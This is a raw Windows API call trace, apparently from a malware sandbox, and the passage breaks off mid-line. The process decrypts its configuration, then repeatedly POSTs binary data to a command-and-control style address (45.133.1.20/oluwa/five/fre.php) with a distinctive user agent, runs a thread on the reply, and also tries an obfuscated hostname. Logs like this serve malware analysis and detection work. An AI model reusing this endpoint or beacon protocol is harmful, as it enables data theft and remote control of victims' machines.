GetProcessHeap () returned 0x6a0000 [0288.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0288.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.788] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0288.805] GetProcessHeap () returned 0x6a0000 [0288.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.807] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0288.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.808] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.810] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.810] GetProcessHeap () returned 0x6a0000 [0288.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.812] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0288.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.813] CryptDestroyKey (hKey=0x6ad020) returned 1 [0288.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.814] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0288.814] GetProcessHeap () returned 0x6a0000 [0288.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.816] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0288.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.817] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0288.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0288.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.845] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0288.845] GetProcessHeap () returned 0x6a0000 [0288.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0288.846] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0288.846] GetProcessHeap () returned 0x6a0000 [0288.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0288.846] socket (af=2, type=1, protocol=6) returned 0xab4 [0288.846] connect (s=0xab4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0288.882] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0288.882] GetProcessHeap () returned 0x6a0000 [0288.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0288.883] GetProcessHeap () returned 0x6a0000 [0288.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0288.889] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.891] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.891] GetProcessHeap () returned 0x6a0000 [0288.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8530 [0288.891] GetProcessHeap () returned 0x6a0000 [0288.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.892] GetProcessHeap () returned 0x6a0000 [0288.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0288.892] GetProcessHeap () returned 0x6a0000 [0288.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0288.893] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.894] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.895] GetProcessHeap () returned 0x6a0000 [0288.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0288.895] GetProcessHeap () returned 0x6a0000 [0288.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.895] send (s=0xab4, buf=0x6bd460*, len=242, flags=0) returned 242 [0288.896] send (s=0xab4, buf=0x6bb998*, len=159, flags=0) returned 159 [0288.896] GetProcessHeap () returned 0x6a0000 [0288.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0288.896] recv (in: s=0xab4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0288.979] GetProcessHeap () returned 0x6a0000 [0288.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0288.980] GetProcessHeap () returned 0x6a0000 [0288.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0288.980] GetProcessHeap () returned 0x6a0000 [0288.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8530 | out: hHeap=0x6a0000) returned 1 [0288.981] GetProcessHeap () returned 0x6a0000 [0288.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0288.981] closesocket (s=0xab4) returned 0 [0288.982] GetProcessHeap () returned 0x6a0000 [0288.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0288.982] GetProcessHeap () returned 0x6a0000 [0288.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.983] GetProcessHeap () returned 0x6a0000 [0288.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0288.984] GetProcessHeap () returned 0x6a0000 [0288.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0288.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd88) returned 0xab4 [0288.987] Sleep (dwMilliseconds=0xea60) [0288.988] GetProcessHeap () returned 0x6a0000 [0288.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0288.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0289.070] GetProcessHeap () returned 0x6a0000 [0289.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0289.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.088] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0289.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.090] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.108] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.108] GetProcessHeap () returned 0x6a0000 [0289.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0289.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.110] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0289.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.145] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0289.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.146] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0289.146] GetProcessHeap () returned 0x6a0000 [0289.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.148] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.150] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.152] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.152] GetProcessHeap () returned 0x6a0000 [0289.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0289.152] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0289.160] GetProcessHeap () returned 0x6a0000 [0289.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0289.163] GetProcessHeap () returned 0x6a0000 [0289.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0289.163] GetProcessHeap () returned 0x6a0000 [0289.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0289.164] GetProcessHeap () returned 0x6a0000 [0289.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0289.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.165] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.275] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0289.305] GetProcessHeap () returned 0x6a0000 [0289.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0289.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.320] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0289.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.321] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.323] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.323] GetProcessHeap () returned 0x6a0000 [0289.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0289.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.329] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0289.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.331] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0289.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.332] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0289.332] GetProcessHeap () returned 0x6a0000 [0289.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.334] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0289.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.341] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0289.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.343] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0289.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.345] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0289.345] GetProcessHeap () returned 0x6a0000 [0289.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0289.345] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0289.345] GetProcessHeap () returned 0x6a0000 [0289.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0289.345] socket (af=2, type=1, protocol=6) returned 0xab8 [0289.347] connect (s=0xab8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0289.375] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0289.375] GetProcessHeap () returned 0x6a0000 [0289.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0289.375] GetProcessHeap () returned 0x6a0000 [0289.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0289.376] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0289.387] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0289.387] GetProcessHeap () returned 0x6a0000 [0289.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d80b0 [0289.388] GetProcessHeap () returned 0x6a0000 [0289.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0289.388] GetProcessHeap () returned 0x6a0000 [0289.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0289.388] GetProcessHeap () returned 0x6a0000 [0289.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0289.390] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0289.391] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0289.391] GetProcessHeap () returned 0x6a0000 [0289.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0289.391] GetProcessHeap () returned 0x6a0000 [0289.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0289.392] send (s=0xab8, buf=0x6bd460*, len=242, flags=0) returned 242 [0289.393] send (s=0xab8, buf=0x6bb998*, len=159, flags=0) returned 159 [0289.393] GetProcessHeap () returned 0x6a0000 [0289.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0289.393] recv (in: s=0xab8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0289.485] GetProcessHeap () returned 0x6a0000 [0289.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0289.486] GetProcessHeap () returned 0x6a0000 [0289.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0289.487] GetProcessHeap () returned 0x6a0000 [0289.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d80b0 | out: hHeap=0x6a0000) returned 1 [0289.487] GetProcessHeap () returned 0x6a0000 [0289.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0289.488] closesocket (s=0xab8) returned 0 [0289.489] GetProcessHeap () returned 0x6a0000 [0289.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0289.489] GetProcessHeap () returned 0x6a0000 [0289.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0289.489] GetProcessHeap () returned 0x6a0000 [0289.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0289.490] GetProcessHeap () returned 0x6a0000 [0289.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0289.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x238) returned 0xab8 [0289.501] Sleep (dwMilliseconds=0xea60) [0289.507] GetProcessHeap () returned 0x6a0000 [0289.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0289.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.510] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0289.533] GetProcessHeap () returned 0x6a0000 [0289.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0289.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.534] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0289.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.536] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.564] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.564] GetProcessHeap () returned 0x6a0000 [0289.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0289.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.567] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0289.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.569] CryptDestroyKey (hKey=0x6ad020) returned 1 [0289.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.571] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0289.571] GetProcessHeap () returned 0x6a0000 [0289.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.577] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.579] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.614] GetProcessHeap () returned 0x6a0000 [0289.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0289.614] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0289.614] GetProcessHeap () returned 0x6a0000 [0289.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0289.615] GetProcessHeap () returned 0x6a0000 [0289.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0289.615] GetProcessHeap () returned 0x6a0000 [0289.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0289.616] GetProcessHeap () returned 0x6a0000 [0289.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0289.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.628] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0289.637] GetProcessHeap () returned 0x6a0000 [0289.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0289.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.639] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, 